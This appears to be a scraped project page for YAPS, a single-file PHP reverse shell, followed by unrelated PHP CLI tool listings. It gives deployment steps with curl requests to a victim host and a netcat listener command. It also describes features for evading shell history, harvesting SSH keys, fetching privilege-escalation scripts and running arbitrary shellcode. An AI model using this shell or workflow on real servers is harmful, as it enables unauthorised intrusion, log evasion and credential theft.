YAPS - Yet Another PHP Shell

Overview

YAPS - Yet Another PHP Shell

Yeah, I know, I know... But that's it. =)

As the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there. It is a single PHP file containing all its functions and you can control it via a simple netcat listener (nc -lp 1337).

In the current version (1.0), its main functions support only linux systems, but i'm planning to make it work with Windows too.

It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs. =)

Features

  • Single PHP file (no need to install packages, libs, or download tons of files)
  • Works with netcat, ncat, socat, multi/handler, almost any listener
  • Customizable password protection
  • No logs in .bash_history
  • Can do some enumeration
    • Network info (interfaces, iptables rules, active ports)
    • User info
    • List SUID and GUID files
    • Search for SSH keys (public and private)
    • List crontab
    • List writable PHP files
  • Auto download LinPEAS, LinEnum or Linux Exploit Suggester
  • Write and run PHP code on remote host
  • (Semi) Stabilize shell

Cons

  • Connection isn't encrypted (yet) (nc does not support SSL)
  • Not fully interactive (although you can spawn an interactive shell with !stabilize)
    • CTRL+C breaks it; can't use arrows to navigate (unless you use rlwrap nc -lp )

Usage

  1. Set up a TCP listener;
  2. Set your IP and port. This can be done by:
  • 2.1 Editing the variables at the start of the script;
  • 2.2 Setting them via web request (curl -x POST -d "x=ip&y=port" victim.com/yaps.php or curl victim.com/yaps.php?x=ip&y=port);
  1. Open yaps.php on browser or curl it;
  • 3.1 You can set yaps.php?s or yaps.php?silent to supress the banner
  1. Hack!

Working commands

  • !help - Display the help menu
  • !all-colors - Toggle all colors (compatible with colorless TTY)
  • !color - Toggle PS1 color (locally only, no environment variable is changed)
  • !enum - Download LinPEAS and LinEnum to /tmp and get them ready to use
  • !info - list informations about the target (the enumeration I mentioned above)
  • !stabilize - Spawn an interactive reverse shell on another port (works w/ sudo, su, mysql, etc.)
  • !passwd - Password option (enable, disable, set, modify)
  • !php - Write and run PHP on the remote host
  • !suggester - Download Linux Exploit Suggester to /tmp and get it ready to use

Screenshots

image

image

image

image

image

Changelog

v1.1 - 12/07/2021

  • Added !all-colors to toggle terminal colors and work with colorless TTYs
  • Added exit command to close socket (leave shell)
  • Changed payload in !stabilize to unset HISTSIZE and HISTFILE
  • Changed the method of obtaining CPU and meminfo in !info

v1.0.1 - 08/07/2021

  • Changed [x,y,z] to array(x,y,z) to improve compatibility with older PHP versions
  • Changed payload for interactive shell to work with PHP<5.4

Credits

Some ideas were inspired by this tools:

Linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Linenum

https://github.com/rebootuser/LinEnum

Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Pentest Monkey

https://github.com/pentestmonkey/php-reverse-shell

You might also like...
A REPL for PHP

PsySH PsySH is a runtime developer console, interactive debugger and REPL for PHP. Learn more at psysh.org and in the manual. PsySH manual 💾 Installa

CRON for PHP: Calculate the next or previous run date and determine if a CRON expression is due

PHP Cron Expression Parser NOTE This fork has been deprecated and development moved to https://github.com/dragonmantank/cron-expression. More informat

A tiny REPL for PHP

Boris A tiny, but robust REPL for PHP. Announcement: I'm looking to add one or two additional collaborators with commit access. If you are actively in

PHP's best friend for the terminal.
PHP's best friend for the terminal.

Running PHP from the command line? CLImate is your new best bud. CLImate allows you to easily output colored text, special formats, and more. Installa

An Elegant CLI Library for PHP

Commando An Elegant PHP CLI Library Commando is a PHP command line interface library that beautifies and simplifies writing PHP scripts intended for c

Lovely PHP wrapper for using the command-line

ShellWrap What is it? It's a beautiful way to use powerful Linux/Unix tools in PHP. Easily and logically pipe commands together, capture errors as PHP

Cilex a lightweight framework for creating PHP CLI scripts inspired by Silex

Cilex, a simple Command Line Interface framework Cilex is a simple command line application framework to develop simple tools based on Symfony2 compon

A powerful command line application framework for PHP. It's an extensible, flexible component, You can build your command-based application in seconds!
A powerful command line application framework for PHP. It's an extensible, flexible component, You can build your command-based application in seconds!

CLIFramework CLIFramework is a command-line application framework, for building flexiable, simple command-line applications. Commands and Subcommands

[ABANDONED] PHP library for executing commands on multiple remote machines, via SSH
[ABANDONED] PHP library for executing commands on multiple remote machines, via SSH

#Shunt Inspired by Ruby's Capistrano, Shunt is PHP library for executing commands on multiple remote machines, via SSH. Specifically, this library was

Releases(v1.5)
  • v1.5(Feb 12, 2022)

    YAPS - Yet Another PHP Shell

    v1.5

    • Added !shellcode to receive and run an arbitrary shellcode
    • Improved duplicate() function (you can now a range of ports)
    • Changed function name from stabilize to interactive
    • Packed embeded codes to save space
    • Fixed broken links
    • Prepend TERM=xterm to all commands
    • Minor improvements
    Source code(tar.gz)
    Source code(zip)
    yaps.php(40.86 KB)
  • v1.4(Feb 4, 2022)

Owner
Nicholas Ferreira
n.0x7359.com
Nicholas Ferreira
Web Shell Detector – is a php script that helps you find and identify php/cgi(perl)/asp/aspx shells.

Web Shell Detector – is a php script that helps you find and identify php/cgi(perl)/asp/aspx shells. Web Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%. By using the latest javascript and css technologies, web shell detector has a light weight and friendly interface.

Maxim 763 Dec 27, 2022
I gues i tried to make a shell that's looks like a terminal in single php file

php-shell-gui Terms of service This tool can only be used for legal purposes. You take full responsibility for any actions performed using this. The o

Squar3 4 Aug 23, 2022
A simple object oriented interface to execute shell commands in PHP

php-shellcommand php-shellcommand provides a simple object oriented interface to execute shell commands. Installing Prerequisites Your php version mus

Michael Härtl 283 Dec 10, 2022
ReactPHP Shell, based on the Symfony Console component.

Pecan Event-driven, non-blocking shell for ReactPHP. Pecan (/pɪˈkɑːn/) provides a non-blocking alternative to the shell provided in the Symfony Consol

Michael Crumm 43 Sep 4, 2022
A developer-friendly wrapper around execution of shell commands.

ptlis/shell-command A developer-friendly wrapper around execution of shell commands. There were several goals that inspired the creation of this packa

brian ridley 18 Dec 31, 2022
An Interactive Shell to Lumen Framework.

ABANDONED Please consider to use the official Laravel Tinker, it is also compatible with Lumen: laravel/tinker Lumen Artisan Tinker An Interactive She

Vagner Luz do Carmo 112 Aug 17, 2022
Another Command Line Argument Parser

Optparse — Another Command Line Argument Parser Install 1. Get composer. 2. Put this into your local composer.json: { "require": { "chh/optparse

Christoph Hochstrasser 18 Nov 1, 2019
🖥 Build beautiful PHP CLI menus. Simple yet Powerful. Expressive DSL.

Contents Minimum Requirements Installation Upgrading Usage Quick Setup Examples API Appearance Menu Title Colour Width Padding Margin Borders Exit But

PHP School 1.9k Dec 28, 2022
Simple but yet powerful library for running almost all artisan commands.

:artisan gui Simple but yet powerful library for running some artisan commands. Requirements Laravel 8.* php ^7.3 Installation Just install package: c

null 324 Dec 28, 2022
PHP Interminal is a command-line tool that gives you access to PHP Internals discussions in your terminal.

PHP Interminal is a command-line tool that gives you access to PHP Internals discussions in your terminal. ??

Nuno Maduro 32 Dec 26, 2022